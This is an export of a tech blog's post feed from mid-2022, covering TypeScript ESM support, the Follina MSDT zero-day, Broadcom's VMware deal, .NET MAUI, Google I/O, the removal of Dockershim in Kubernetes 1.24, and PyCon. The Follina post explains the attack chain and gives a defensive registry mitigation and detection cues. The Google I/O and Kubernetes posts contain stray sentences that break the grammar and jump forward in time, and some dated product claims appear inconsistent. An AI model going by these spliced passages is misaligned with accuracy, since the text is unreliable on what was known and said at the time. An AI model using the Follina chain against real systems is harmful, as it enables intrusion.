\u0026#34;./dist\u0026#34;, \u0026#34;declaration\u0026#34;: true } } The Library Author\u0026rsquo;s Perspective # For library authors, this release is arguably more important than for application developers. The ability to publish packages with proper \u0026quot;exports\u0026quot; maps that TypeScript actually understands means you can finally ship dual ESM/CJS packages with confidence that consumers on both sides will get correct type resolution.\nThe package.json \u0026quot;exports\u0026quot; field has been one of the more powerful but underused features in the Node.js ecosystem, largely because TypeScript\u0026rsquo;s inability to understand it made it a source of type resolution failures. With 4.7, a package can declare:\n{ \u0026#34;exports\u0026#34;: { \u0026#34;.\u0026#34;: { \u0026#34;import\u0026#34;: \u0026#34;./dist/esm/index.js\u0026#34;, \u0026#34;require\u0026#34;: \u0026#34;./dist/cjs/index.js\u0026#34; } } } And TypeScript will correctly resolve types for both entry points, assuming the appropriate .d.ts files are co-located with the JavaScript output.\nI maintain a few open-source Node.js libraries, and I\u0026rsquo;ve been holding off on shipping ESM builds precisely because the tooling story was incomplete. With TypeScript 4.7, I\u0026rsquo;ll be setting up dual builds over the coming weeks. It\u0026rsquo;s not that it was technically impossible before — but it required enough hacks and workarounds that the maintenance burden wasn\u0026rsquo;t worth it.\nThe Rough Edges # Let me be honest: this isn\u0026rsquo;t a fairy-tale ending. There are still pain points:\nThe .js extension in imports is confusing to newcomers. Writing import { handler } from \u0026quot;./utils.js\u0026quot; when the source file is utils.ts violates developer intuition. The TypeScript team\u0026rsquo;s rationale is sound — TypeScript doesn\u0026rsquo;t rewrite import paths, and the runtime will need the .js extension — but expect this to generate Stack Overflow questions for years.\nThe ecosystem is still catching up. Many popular packages don\u0026rsquo;t have proper \u0026quot;exports\u0026quot; fields yet, and some have \u0026quot;exports\u0026quot; configurations that don\u0026rsquo;t work correctly with TypeScript\u0026rsquo;s new resolution. Jest, in particular, has had a rocky relationship with ESM, and adding TypeScript\u0026rsquo;s new modes into the mix doesn\u0026rsquo;t make it simpler.\nBuild tooling fragmentation continues. Between tsc, esbuild, swc, tsx, ts-node, and various bundlers, the matrix of \u0026ldquo;which tool supports which TypeScript module mode\u0026rdquo; is getting unwieldy. If you\u0026rsquo;re using ts-node for development, for example, its ESM support is still experimental and requires the --esm flag plus a loader hook.\nMy Take # TypeScript 4.7\u0026rsquo;s ESM support is overdue but welcome. The TypeScript team made the right call by aligning with Node.js\u0026rsquo;s actual resolution semantics rather than inventing their own abstraction. It\u0026rsquo;s going to be painful in the short term — there will be migration headaches, confused developers, and packages that break in unexpected ways.\nBut this is one of those changes that needed to happen for the Node.js ecosystem to fully embrace ES modules. As long as TypeScript couldn\u0026rsquo;t properly understand ESM resolution, a huge portion of the Node.js community was effectively locked into CommonJS patterns. Now we can start moving forward.\nMy advice: don\u0026rsquo;t rush to migrate existing projects. Wait for the dust to settle, let the ecosystem tools catch up, and start using node16 resolution on new projects. For existing libraries, start planning your dual ESM/CJS builds — your users will thank you. The module wars are finally approaching a ceasefire, and TypeScript 4.7 just brought us significantly closer to peace.\n","date":"9 June 2022","externalUrl":null,"permalink":"/posts/220609-typescript-47-esm-support/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 4.7 ships with proper ES module support for Node.js, resolving one of the ecosystem’s most painful interoperability headaches.","title":"TypeScript 4.7 Finally Tackles Node.js ES Modules — Was It Worth the Wait?","type":"posts"},{"content":"If you thought we were done with the era of \u0026ldquo;open a Word document, get compromised,\u0026rdquo; think again. A new zero-day vulnerability tracked as CVE-2022-30190 — nicknamed \u0026ldquo;Follina\u0026rdquo; — has been actively exploited in the wild, and it\u0026rsquo;s a nasty one. It abuses the Microsoft Support Diagnostic Tool (MSDT) through specially crafted Office documents, and the truly alarming part: it doesn\u0026rsquo;t require macros to be enabled.\nHow Follina Works # The attack chain is deceptively elegant in its simplicity. An attacker creates a Word document that contains an external OLE object reference pointing to a malicious URL. When the document is opened (or even previewed in Explorer), Word fetches the remote HTML, which then invokes MSDT via the ms-msdt: protocol handler. From there, arbitrary PowerShell code executes with the privileges of the calling application.\nLet me break down why this is particularly dangerous:\nNo macro prompt: Unlike traditional Office-based attacks, the user never sees a \u0026ldquo;Enable Macros\u0026rdquo; warning. The payload executes through the MSDT protocol handler, bypassing the protections that organizations have spent years building around macro security.\nPreview pane exploitation: In some configurations, simply previewing the document in Windows Explorer is enough to trigger the exploit. The user doesn\u0026rsquo;t even need to fully open the file.\nWide attack surface: MSDT is present on virtually every Windows installation. The vulnerability affects Office 2013, 2016, 2019, 2021, and Microsoft 365 — essentially the entire modern Office ecosystem.\nSecurity researcher Kevin Beaumont, who gave the vulnerability its name (after the Italian town of Follina, referencing a 0438 area code in a malicious sample), documented the timeline showing that samples exploiting this technique were uploaded to VirusTotal as far back as April 2022. The vulnerability was only widely disclosed in late May.\nThe Deeper Problem: Protocol Handlers as Attack Surface # What makes Follina particularly interesting from a security architecture perspective is that it highlights a long-standing problem with Windows protocol handlers. The ms-msdt: URI scheme is just one of hundreds of registered protocol handlers on a typical Windows installation, and the trust model around how Office applications interact with these handlers has always been questionable.\nThis isn\u0026rsquo;t the first time protocol handlers have been weaponized. We saw similar issues with ms-officecmd: handlers and various browser-to-application protocol bridges over the years. The fundamental design flaw is that these handlers were built with functionality in mind, not security. They accept complex parameter strings that can include commands, file paths, and scripts — exactly the kind of input that an attacker dreams about controlling.\nFor developers building applications that register custom protocol handlers, Follina should serve as a wake-up call. If your application accepts parameters through a URI scheme, ask yourself: what happens if an attacker controls that input entirely? Have you validated and sanitized those parameters as rigorously as you would for a web API endpoint?\nMitigation and Response # Microsoft\u0026rsquo;s initial response was to publish guidance recommending that administrators disable the MSDT URL protocol by deleting the HKEY_CLASSES_ROOT\\ms-msdt registry key. That\u0026rsquo;s a reasonable emergency mitigation, but it\u0026rsquo;s the kind of heavy-handed approach that tells you there\u0026rsquo;s no clean fix yet.\nreg delete HKEY_CLASSES_ROOT\\ms-msdt /f For organizations running Microsoft Defender, attack surface reduction rules can help detect and block the exploit chain. Specifically, the rule \u0026ldquo;Block all Office applications from creating child processes\u0026rdquo; will prevent the most common exploitation path.\nIf you\u0026rsquo;re running a SOC or doing incident response, the detection opportunities are solid. Look for:\nmsdt.exe spawned as a child process of any Office application PowerShell execution initiated from msdt.exe Network connections from msdt.exe to external hosts Suspicious sdiagnhost.exe activity The YARA rules and Sigma detections from the security community have been excellent — check the Huntress blog post for a thorough technical breakdown and detection guidance.\nWhat This Means for Development Teams # You might think \u0026ldquo;I\u0026rsquo;m a developer, not a sysadmin — this doesn\u0026rsquo;t affect me.\u0026rdquo; But it does. If your CI/CD pipeline processes documents (think: automated document conversion, content extraction, or testing), you could be exposed. Any system that renders or processes Office documents in an automated fashion needs to be evaluated.\nI\u0026rsquo;ve worked on projects where document processing was treated as a purely functional concern — convert this DOCX to PDF, extract this text, merge these templates. Security considerations around the processing of untrusted documents were an afterthought at best. Follina is a reminder that document formats are complex attack surfaces.\nConsider sandboxing any document processing workloads. Run them in containers with restricted network access and minimal system privileges. Don\u0026rsquo;t process untrusted documents on the same systems that have access to your source code, deployment credentials, or customer data.\nMy Take # Follina is a masterclass in why defense in depth matters. Every individual component in the attack chain — OLE references, external URL fetching, protocol handlers, diagnostic tools — was working as designed. The vulnerability exists in the composition of these features, in the trust boundaries (or lack thereof) between them.\nThis is the kind of bug that makes me deeply uncomfortable about the complexity of modern software stacks. We\u0026rsquo;re running systems where no single person fully understands the interaction between all the components, and attackers only need to find one unexpected interaction to get code execution.\nPatch when Microsoft releases a fix. Disable MSDT in the meantime. And take a hard look at how your organization handles document-based threats, because I guarantee this won\u0026rsquo;t be the last protocol handler vulnerability we see.\n","date":"2 June 2022","externalUrl":null,"permalink":"/posts/220602-follina-zero-day-msdt/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2022-30190, dubbed Follina, exploits Microsoft’s diagnostic tool through Office documents — no macros required.","title":"Follina — The Zero-Day That Turns a Word Doc Into a Weapon","type":"posts"},{"content":"This week, Broadcom announced it would acquire VMware for approximately $61 billion, making it one of the largest technology deals in history. For anyone who has spent the last two decades building infrastructure on VMware\u0026rsquo;s hypervisor stack, this is not just a headline — it\u0026rsquo;s a signal to pay close attention.\nThe Deal in Context # Broadcom, primarily known as a semiconductor and infrastructure software company, has been on an acquisition spree. After absorbing CA Technologies in 2018 and Symantec\u0026rsquo;s enterprise security division in 2019, VMware represents the crown jewel: a company whose vSphere platform still underpins a staggering amount of enterprise compute worldwide.\nThe numbers are massive. VMware pulled in $12.85 billion in revenue last fiscal year, and despite the relentless push toward public cloud, its on-premises virtualization business remains deeply embedded in data centers globally. Broadcom CEO Hock Tan has built his empire by acquiring established enterprise software companies, trimming costs, and focusing on the most profitable product lines. That playbook is what has many VMware customers and partners nervously looking at the fine print.\nWhy VMware Still Matters # It\u0026rsquo;s easy to look at this deal through the lens of \u0026ldquo;on-prem is dead, cloud is king,\u0026rdquo; but that\u0026rsquo;s a gross oversimplification. In my experience consulting with enterprises across Europe, VMware\u0026rsquo;s footprint is enormous. vSphere, NSX for networking, vSAN for storage — these products form the backbone of hybrid cloud strategies at thousands of organizations.\nVMware has also been making smart moves with Tanzu, their Kubernetes platform, essentially bridging the gap between traditional VM-based workloads and modern container orchestration. Their multi-cloud management story through VMware Cloud on AWS, Azure VMware Solution, and Google Cloud VMware Engine was genuinely compelling. The question now is whether Broadcom will continue investing in these forward-looking products or whether they\u0026rsquo;ll focus on milking the established vSphere cash cow.\nThe Broadcom Playbook — And Why It Worries Me # If you look at what happened after Broadcom acquired CA Technologies, the pattern is clear: significant layoffs, product portfolio rationalization, and a sharp focus on extracting maximum revenue from existing customers. Support quality declined. Innovation slowed. Customers who were locked in had little choice but to accept the new reality.\nI\u0026rsquo;ve seen this movie before in my thirty years in this industry. When a financial-engineering-focused acquirer takes over a technology company that enterprises depend on, the short-term financial results look great, but the long-term ecosystem suffers. Partners get squeezed, smaller customers lose access to favorable licensing, and the engineering talent that built the platform starts looking for the exit.\nFor teams currently running VMware-heavy environments, this is the time to start thinking about contingency plans — not panic-driven migrations, but thoughtful evaluations of alternatives. What would it take to run your workloads on Proxmox VE, or to accelerate your Kubernetes adoption? How dependent are you on VMware-specific features like vMotion or DRS that don\u0026rsquo;t have direct equivalents elsewhere?\nThe Hybrid Cloud Implications # The timing of this deal is particularly interesting given where enterprises are in their cloud journey. Many organizations that went \u0026ldquo;all in\u0026rdquo; on public cloud between 2018 and 2021 are now dealing with cost overruns and are repatriating workloads back to on-premises infrastructure. VMware was perfectly positioned to benefit from this trend with its hybrid cloud narrative.\nUnder Broadcom\u0026rsquo;s ownership, the question becomes: will they maintain the partnerships with AWS, Azure, and Google Cloud that make VMware a genuine multi-cloud bridge? Or will those relationships deteriorate as Broadcom focuses on the higher-margin on-premises licensing?\nFor DevOps teams and infrastructure engineers, the practical advice is straightforward: document your VMware dependencies, understand your licensing terms, and start building skills in alternative technologies. Not because VMware is going away tomorrow, but because the incentive structure of the company that owns it is about to change fundamentally.\nMy Take # I\u0026rsquo;m skeptical about this deal being good for the VMware ecosystem. Broadcom\u0026rsquo;s track record suggests optimization for shareholder value over customer experience. VMware at its best was an innovation company that genuinely made infrastructure better — vSphere literally changed how we think about compute resources. Under Broadcom, I expect it becomes a licensing revenue extraction machine.\nThe silver lining? Competition is healthy. If Broadcom pushes VMware customers hard enough, it could accelerate adoption of open-source alternatives, Kubernetes-native infrastructure, and genuinely multi-cloud architectures. Sometimes the best thing that can happen to an ecosystem is for the dominant player to give everyone a reason to look elsewhere.\nThis deal still needs regulatory approval and won\u0026rsquo;t close for months, but the planning should start now. The enterprise infrastructure landscape just got a lot more interesting — and a lot more uncertain.\n","date":"26 May 2022","externalUrl":null,"permalink":"/posts/220526-broadcom-vmware-acquisition/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Broadcom’s proposed $61B acquisition of VMware could reshape the enterprise cloud and virtualization landscape for years to come.","title":"Broadcom's $61 Billion VMware Bet — What It Means for Cloud Infrastructure","type":"posts"},{"content":"After a long development journey and several delays, Microsoft has announced that .NET MAUI (Multi-platform App UI) will reach general availability next week alongside Visual Studio 2022 17.3 Preview. Having tracked this project since it was first announced at Build 2020, I\u0026rsquo;m cautiously optimistic — and I emphasize \u0026ldquo;cautiously\u0026rdquo; because cross-platform UI frameworks have a long history of promising more than they deliver.\n.NET MAUI is the evolution of Xamarin.Forms, Microsoft\u0026rsquo;s mobile cross-platform framework that has been around since 2014. But MAUI is more ambitious: it targets not just iOS and Android, but also Windows and macOS from a single codebase. It\u0026rsquo;s built on .NET 6, uses a single project structure, and promises hot reload, modern tooling, and a path forward for the hundreds of thousands of Xamarin.Forms applications already in production.\nWhat MAUI Actually Changes # If you\u0026rsquo;ve worked with Xamarin.Forms, MAUI will feel familiar — it\u0026rsquo;s evolutionary rather than revolutionary. The XAML-based UI definition is still there, the MVVM pattern is still the primary architecture, and the abstraction layer over native controls works the same way conceptually.\nThe practical improvements are in the developer experience:\nSingle project structure. Xamarin.Forms required separate platform projects for iOS and Android, each with their own configuration, assets, and startup code. MAUI consolidates this into a single project with platform-specific folders where you need them. It sounds minor, but managing multiple project files was a genuine source of friction and merge conflicts.\nHandlers over Renderers. MAUI replaces the Renderer architecture with Handlers — a simpler, more performant mapping between cross-platform controls and native controls. Renderers were one of the most painful parts of Xamarin.Forms development, especially when you needed to customize native behavior. Handlers use a mapper pattern that\u0026rsquo;s more intuitive and generates less boilerplate.\nBlazor Hybrid. This is the sleeper feature. MAUI includes BlazorWebView, which lets you embed Blazor components (web UI built with C# and Razor) inside a native MAUI application. Your Blazor code runs natively — no WebAssembly, no server connection — with full access to native APIs through the host application. For teams that have invested in Blazor for web, this is a compelling path to mobile and desktop.\nHot Reload. Both XAML Hot Reload and .NET Hot Reload are supported, meaning you can modify UI and C# code while the app is running and see changes reflected without restarting. This has been a weak spot for the Xamarin ecosystem compared to frameworks like Flutter and React Native, so it\u0026rsquo;s good to see it prioritized.\nThe Competitive Landscape # MAUI enters a crowded field. Flutter just announced version 3 with six-platform support at Google I/O last week. React Native continues to dominate in mindshare, especially among web developers. Kotlin Multiplatform is gaining traction in the Android-first world. Even Electron, despite its resource overhead, remains the go-to for desktop cross-platform applications.\nEach framework has its constituency. React Native has the JavaScript ecosystem. Flutter has Google\u0026rsquo;s momentum and Dart\u0026rsquo;s performance story. Kotlin Multiplatform has JetBrains and the Android developer community. MAUI has\u0026hellip; the .NET ecosystem.\nAnd that\u0026rsquo;s not a small thing. There are millions of C# developers in enterprises worldwide. Many of them are building internal tools, line-of-business applications, and customer-facing apps that need to work on multiple platforms. For these developers, MAUI means they can leverage their existing C# skills, their existing business logic libraries, and their existing team expertise without adopting a new language or ecosystem.\nThe question is whether MAUI can deliver a good enough experience to keep those developers from wandering to Flutter or React Native. Xamarin.Forms had a reputation for rough edges — sluggish performance on Android, limited community components, and an update cadence that lagged behind the native platforms. MAUI needs to break that reputation.\nThe Migration Question # For existing Xamarin.Forms applications, migration to MAUI is a necessary conversation because Xamarin support ends in May 2024. Microsoft has published migration guides, and the .NET Upgrade Assistant can automate much of the mechanical conversion.\nIn practice, the migration complexity scales with how much you\u0026rsquo;ve customized. Simple apps with standard controls will migrate relatively cleanly. Apps with extensive custom renderers, platform-specific code, and third-party library dependencies will require more work — particularly because not all Xamarin community libraries have MAUI versions yet.\nMy advice: start your migration planning now, even if you don\u0026rsquo;t execute immediately. Identify your custom renderers, catalog your third-party dependencies, and test your business logic on .NET 6. The mechanical conversion is the easy part; the hard part is the ecosystem dependencies that aren\u0026rsquo;t ready yet.\nThe Enterprise Angle # Where MAUI might find its strongest footing is in enterprise development. Large organizations running on the Microsoft stack — Azure, SQL Server, Active Directory, Office 365 — have a natural affinity for .NET-based tools. MAUI\u0026rsquo;s integration with Visual Studio, its support for enterprise deployment scenarios, and its first-class MVVM tooling all align with how enterprise teams work.\nI\u0026rsquo;ve seen this pattern before with WPF. It was never the \u0026ldquo;cool\u0026rdquo; choice, but it became the backbone of internal enterprise applications across thousands of companies. MAUI could fill a similar role for cross-platform enterprise apps — not glamorous, but solid, maintainable, and supported by a company that isn\u0026rsquo;t going anywhere.\nMy Take # .NET MAUI is a solid framework for the right audience. If your team lives in the .NET ecosystem, builds business applications, and needs cross-platform reach, MAUI deserves serious evaluation. It\u0026rsquo;s a meaningful improvement over Xamarin.Forms, the tooling is modern, and the Blazor Hybrid story is genuinely interesting.\nIf you\u0026rsquo;re starting from scratch with no .NET investment, I\u0026rsquo;d still probably recommend Flutter for cross-platform mobile development. The widget library is more mature, the community is larger, and the hot reload experience is slightly better. But \u0026ldquo;best framework\u0026rdquo; is always contextual — what your team knows, what your backend looks like, and what platforms you\u0026rsquo;re targeting all matter more than benchmark comparisons.\nThe cross-platform framework wars aren\u0026rsquo;t going to produce a single winner. What we\u0026rsquo;re getting instead is genuine competition that pushes all the players to improve. And that\u0026rsquo;s the best outcome for developers regardless of which framework we choose.\n","date":"19 May 2022","externalUrl":null,"permalink":"/posts/220519-dotnet-maui-ga-cross-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":".NET MAUI reaches general availability, replacing Xamarin.Forms as Microsoft’s unified cross-platform UI framework.","title":".NET MAUI Goes GA — Microsoft's Cross-Platform Bet Materializes","type":"posts"},{"content":"Google I/O wrapped up yesterday, and as usual, it was a firehose of announcements spanning hardware, software, and services. But the throughline this year was unmistakable: AI is moving from research demonstrations into practical, developer-accessible tools. And honestly, some of what Google showed is genuinely impressive — not in the \u0026ldquo;look at this cool demo\u0026rdquo; sense, but in the \u0026ldquo;I can actually use this\u0026rdquo; sense.\nThe headline AI announcement was PaLM (Pathways Language Model), a 540-billion parameter language model that achieves breakthrough performance on reasoning tasks. But what caught my attention wasn\u0026rsquo;t the model itself — it was the ecosystem Google is building around making these capabilities accessible to developers who aren\u0026rsquo;t ML researchers.\nPaLM and the Scale Question # Google\u0026rsquo;s PaLM paper, published last month, demonstrated that scaling language models continues to yield improvements, particularly in reasoning and code generation tasks. The model achieved state-of-the-art results on hundreds of benchmarks and showed emergent abilities — capabilities that appear suddenly at certain scale thresholds rather than improving gradually.\nWhat\u0026rsquo;s technically fascinating about PaLM is the Pathways system it\u0026rsquo;s trained on. Later foundation models would build on similar distributed training approaches. Traditional large model training uses data parallelism across GPUs, but Pathways enables efficient training across 6,144 TPU v4 chips in two Cloud TPU pods. That\u0026rsquo;s a different kind of infrastructure challenge — one that only a handful of organizations on earth can even attempt.\nThe practical question for those of us who build software but don\u0026rsquo;t train 540B parameter models is: how does this translate into tools we can use? Google\u0026rsquo;s answer at I/O was multi-pronged.\nAI-Powered Development Tools # The announcement I\u0026rsquo;m most excited about is the continued evolution of AI coding assistance. Google showed improvements to code completion and generation across their tools, building on the Codey work that integrates with Cloud Workstations and the broader Google Cloud development experience.\nMore broadly, the industry trend toward AI-assisted coding is accelerating. GitHub Copilot has been in technical preview for almost a year now, and the results suggest developers are finding real productivity gains. Google is clearly not going to cede this ground.\nWhat I find interesting is the convergence happening across companies. Whether it\u0026rsquo;s GitHub Copilot (powered by OpenAI\u0026rsquo;s Codex), Google\u0026rsquo;s internal tools, or Amazon\u0026rsquo;s CodeWhisperer (announced at re:Invent), the core approach is similar. This competition intensified over subsequent years.: train large language models on code, then use them to provide contextual suggestions in the editor.\nWe\u0026rsquo;re still in the early days, but I\u0026rsquo;ve been using Copilot in my daily work for months now, and it\u0026rsquo;s gone from \u0026ldquo;interesting toy\u0026rdquo; to \u0026ldquo;genuinely useful tool.\u0026rdquo; It\u0026rsquo;s particularly good at boilerplate, test generation, and pattern completion. It\u0026rsquo;s not replacing developers — it\u0026rsquo;s replacing the boring parts of development. That\u0026rsquo;s exactly the right place for AI to be.\nMulti-Modal AI and Real Applications # Google showed several multi-modal AI demonstrations at I/O — models that can reason across text, images, and other data types. The Scene Exploration feature for Google Maps, which overlays AI-generated information on real-world camera views, is a compelling demonstration of where this technology is heading.\nFor developers, the practical implications are in the APIs. Google\u0026rsquo;s Vision AI, Natural Language AI, and Translation APIs have been available for years, but the quality improvements from larger models are making previously impractical applications viable. Document understanding, for instance, has gotten good enough that you can now reliably extract structured data from messy real-world documents — invoices, medical forms, legal contracts — with accuracy that would have required custom ML models a year ago.\nI\u0026rsquo;ve been integrating Google\u0026rsquo;s Cloud Vision API into a document processing pipeline for a client, and the improvement in accuracy over the past 12 months is noticeable. AI-assisted workflows became increasingly practical across domains. What used to require extensive post-processing and manual correction is increasingly just working. That\u0026rsquo;s the kind of practical AI progress that actually moves the needle for real software projects.\nFlutter 3 and Cross-Platform # Beyond AI, the other major developer announcement was Flutter 3, now supporting six platforms: iOS, Android, web, Windows, macOS, and Linux. Google is making a serious bet that Flutter can be the cross-platform framework that actually delivers on the \u0026ldquo;write once, run anywhere\u0026rdquo; promise.\nI\u0026rsquo;ve been cautiously optimistic about Flutter since its early days. The Dart language has grown on me (despite my initial skepticism), and the widget-based architecture produces genuinely good-looking applications. Flutter 3\u0026rsquo;s stable support for macOS and Linux desktop targets opens up interesting possibilities for teams that need to build both mobile and desktop applications.\nThe caveat, as always with cross-platform frameworks, is that \u0026ldquo;runs everywhere\u0026rdquo; doesn\u0026rsquo;t mean \u0026ldquo;feels native everywhere.\u0026rdquo; Flutter apps have a distinctive look and feel that\u0026rsquo;s not quite native on any platform. For many applications, that\u0026rsquo;s fine. For others, it\u0026rsquo;s a dealbreaker. Know your users and choose accordingly.\nThe AI Infrastructure Investment # Reading between the lines at I/O, the message is clear: Google is investing heavily in AI infrastructure and expects developers to build on top of it. The new Cloud TPU v4 pods, the Vertex AI platform improvements, and the emphasis on pre-trained models and APIs all point to a future where AI capabilities are consumed as cloud services. The Stargate project represents how AI infrastructure evolved. rather than built from scratch.\nThis has implications for how we architect applications. If AI inference becomes cheap and reliable enough (and it\u0026rsquo;s heading that direction), we\u0026rsquo;ll design systems differently — adding intelligence at integration points where we currently use rules engines or simple heuristics. Email classification, content moderation, search ranking, anomaly detection — these are all areas where \u0026ldquo;good enough\u0026rdquo; AI via an API call beats a hand-crafted solution.\nMy Take # Google I/O 2022 was less about flashy demos and more about infrastructure. That\u0026rsquo;s a sign of maturity. When a technology transitions from \u0026ldquo;look what\u0026rsquo;s possible\u0026rdquo; to \u0026ldquo;here\u0026rsquo;s how to use it in your app,\u0026rdquo; that\u0026rsquo;s when things get interesting for practicing developers.\nThe AI wave is real, and it\u0026rsquo;s not slowing down. But I\u0026rsquo;d encourage fellow developers to focus on the practical rather than the theoretical. You don\u0026rsquo;t need to understand transformer architectures to use a language model API. You don\u0026rsquo;t need to train your own models to add intelligent features to your applications. The barrier to entry is dropping rapidly, and the developers who figure out where to apply AI in their existing systems will have a significant advantage.\nStart small. Add AI to one feature. Measure the results. Iterate. That\u0026rsquo;s how every technology transition actually plays out, regardless of the hype cycle.\n","date":"12 May 2022","externalUrl":null,"permalink":"/posts/220512-google-io-2022-ai-practical-advances/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google I/O 2022 showcases AI advances that are moving beyond demos into developer-accessible tools and practical applications.","title":"Google I/O 2022 — AI Gets Practical, and That's What Matters","type":"posts"},{"content":"Kubernetes 1.24 \u0026ldquo;Stargazer\u0026rdquo; landed this week, and with it, the change that\u0026rsquo;s been looming since December 2020: Dockershim is gone. Removed. No longer shipped with kubelet. If you\u0026rsquo;re running Docker as your container runtime in a Kubernetes cluster and you upgrade to 1.24 without migrating, your nodes will fail to start.\nThis has been one of the most communicated deprecations in Kubernetes history, and yet I guarantee there are teams out there who will be caught off guard. Having been through enough infrastructure migrations to know the pattern, \u0026ldquo;we\u0026rsquo;ll deal with it later\u0026rdquo; has a way of becoming \u0026ldquo;why is production down?\u0026rdquo;\nWhat Dockershim Actually Was # To understand why this matters, you need to understand the architecture. Kubernetes doesn\u0026rsquo;t run containers directly — it delegates to a Container Runtime Interface (CRI) compliant runtime. The CRI specification defines how kubelet communicates with whatever actually manages containers on the node.\nDocker was never CRI-compliant. Docker has its own API, its own daemon, its own way of doing things. So the Kubernetes project maintained Dockershim — a translation layer that sat between kubelet\u0026rsquo;s CRI calls and Docker\u0026rsquo;s API. Later container standardization built on this foundation. It worked, but it was an ongoing maintenance burden for the Kubernetes project, adding complexity and potential failure modes.\nThe original deprecation announcement was careful to explain that this didn\u0026rsquo;t mean Docker images would stop working. OCI images are OCI images regardless of what built them. You can still use docker build to create your images. You can still push them to any registry. The only thing changing is what runs those images on the Kubernetes node.\nThe CRI Alternatives # The two primary CRI-compliant runtimes are containerd and CRI-O. Both are mature, well-tested, and honestly better suited to running containers in a Kubernetes context than Docker ever was. Container security evolved significantly as the ecosystem matured.\ncontainerd is the most natural migration path because it was literally extracted from Docker. Docker itself uses containerd under the hood — when you run Docker on your laptop, containerd is doing the actual container management. By using containerd directly, you\u0026rsquo;re cutting out the middle layer (the Docker daemon) and talking straight to the component that does the work. Less overhead, fewer moving parts, same container execution.\nCRI-O was purpose-built for Kubernetes. It implements exactly the CRI specification and nothing more. It\u0026rsquo;s the \u0026ldquo;do one thing well\u0026rdquo; option. Red Hat and the OpenShift ecosystem lean heavily on CRI-O, and it\u0026rsquo;s proven itself in production at massive scale.\nBoth options support the same OCI image format, the same container lifecycle management, and the same security features. The migration is primarily a node-level infrastructure change, not an application-level one.\nThe Migration Path # If you\u0026rsquo;re running a managed Kubernetes service (EKS, GKE, AKS), you\u0026rsquo;re probably already fine. Most managed providers migrated their default runtime to containerd months or even years ago. GKE defaulted to containerd since 1.19. EKS moved to containerd as the default in 1.24 AMIs. Check your node configuration, but odds are good you\u0026rsquo;re covered.\nSelf-managed clusters are where the work lives. Here\u0026rsquo;s the practical checklist. The operational patterns that emerged from this transition shaped how teams manage infrastructure today.\nIdentify affected nodes. Check what runtime each node is using: kubectl get nodes -o wide shows the container runtime in the last column.\nTest with containerd first. Spin up new nodes with containerd, deploy your workloads, and verify everything works. Pay special attention to:\nAnything that mounts the Docker socket (/var/run/docker.sock) DaemonSets that interact with the container runtime Monitoring tools that use the Docker API for metrics Log collection that depends on Docker\u0026rsquo;s logging driver Migrate node pools. Cordon, drain, reconfigure, uncordon. Standard rolling update procedure. If you\u0026rsquo;re using infrastructure-as-code (and you should be), update your node templates.\nUpdate your tooling. docker exec into a running pod won\u0026rsquo;t work anymore on the node level. Use kubectl exec instead — which you should have been doing anyway. Tools like crictl provide direct access to the CRI runtime if you need node-level debugging.\nThe Docker Socket Problem # The biggest practical issue I\u0026rsquo;ve seen teams hit is Docker socket mounting. It\u0026rsquo;s been a common pattern to mount /var/run/docker.sock into pods that need to build images or manage containers — CI/CD runners being the classic example.\nWith Dockershim gone, there\u0026rsquo;s no Docker socket to mount. If you\u0026rsquo;re running Jenkins agents, GitLab runners, or custom CI pipelines that build Docker images inside Kubernetes, you need an alternative:\nKaniko: Builds container images in Kubernetes without Docker. No daemon, no privileges. My personal recommendation for most use cases. Buildah: Daemonless container building from Red Hat. Works well with Podman. BuildKit: Docker\u0026rsquo;s improved build engine, can run as a standalone service. Each has tradeoffs, but all of them are more secure than mounting the Docker socket, which was always a significant security risk.\nMy Take # This is one of those changes that\u0026rsquo;s been coming for so long that the actual event feels anticlimactic. The Kubernetes project handled the communication well — two years of warnings, detailed migration guides, and clear timelines. If you\u0026rsquo;re caught off guard, that\u0026rsquo;s on you.\nBut I think this moment is symbolically important. Docker revolutionized how we think about application packaging and deployment. It deserves enormous credit for making containers accessible. But the container ecosystem has outgrown any single tool, and the standardization around OCI and CRI means we\u0026rsquo;re no longer dependent on any one implementation.\nI\u0026rsquo;ve been running containerd in my clusters since Kubernetes 1.20, and honestly, you forget it\u0026rsquo;s there — which is exactly what you want from infrastructure. It\u0026rsquo;s faster, uses less memory, and has fewer failure modes than the Docker daemon.\nIf you haven\u0026rsquo;t migrated yet, this week is the week. The path is well-worn and the tooling is ready. Don\u0026rsquo;t let this be the migration you do under pressure at 2 AM.\n","date":"5 May 2022","externalUrl":null,"permalink":"/posts/220505-kubernetes-124-dockershim-removal/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.24 finally removes Dockershim, completing the long-telegraphed divorce from Docker as a container runtime.","title":"Kubernetes 1.24 Drops Dockershim — The End of an Era","type":"posts"},{"content":"PyCon US 2022 is underway in Salt Lake City this week, marking the return to in-person conferences after two years of virtual events. As someone who has attended more PyCons than I care to count, there\u0026rsquo;s something irreplaceable about the hallway track — those impromptu conversations that spark ideas no keynote can match. But beyond the social reunion, this year\u0026rsquo;s PyCon reflects a Python ecosystem that has matured enormously while somehow maintaining its welcoming character.\nPython recently claimed the #1 spot on the TIOBE index, overtaking C for the first time. That\u0026rsquo;s not just a popularity contest metric — it reflects genuine adoption across data science, web development, DevOps tooling, and increasingly, systems programming adjacent work. The language I first picked up as a \u0026ldquo;scripting tool\u0026rdquo; decades ago has become the lingua franca of modern software development.\nThe Performance Story Is Getting Serious # One of the most exciting developments in the Python world right now is the Faster CPython project, led by Mark Shannon and funded by Microsoft (with Guido van Rossum himself involved). The project\u0026rsquo;s goal is ambitious: make CPython 5x faster over several releases.\nPython 3.11, expected later this year, already shows impressive gains. Early benchmarks suggest 10-60% speedups on various workloads compared to 3.10. That might not sound revolutionary to someone coming from compiled languages, but for the Python ecosystem, it\u0026rsquo;s transformative. Every web framework, every data pipeline, every CLI tool gets faster for free — no code changes required.\nThe approach is pragmatic too. Rather than trying to bolt on a JIT compiler in one massive effort, the team is making incremental improvements to the bytecode interpreter, specializing common operations, and laying groundwork for more aggressive optimizations in future releases. It\u0026rsquo;s the kind of engineering discipline that gives me confidence this will actually land.\nType Hints: From Optional Nicety to Essential Tool # When PEP 484 introduced type hints back in Python 3.5, plenty of people in the community dismissed them. \u0026ldquo;If I 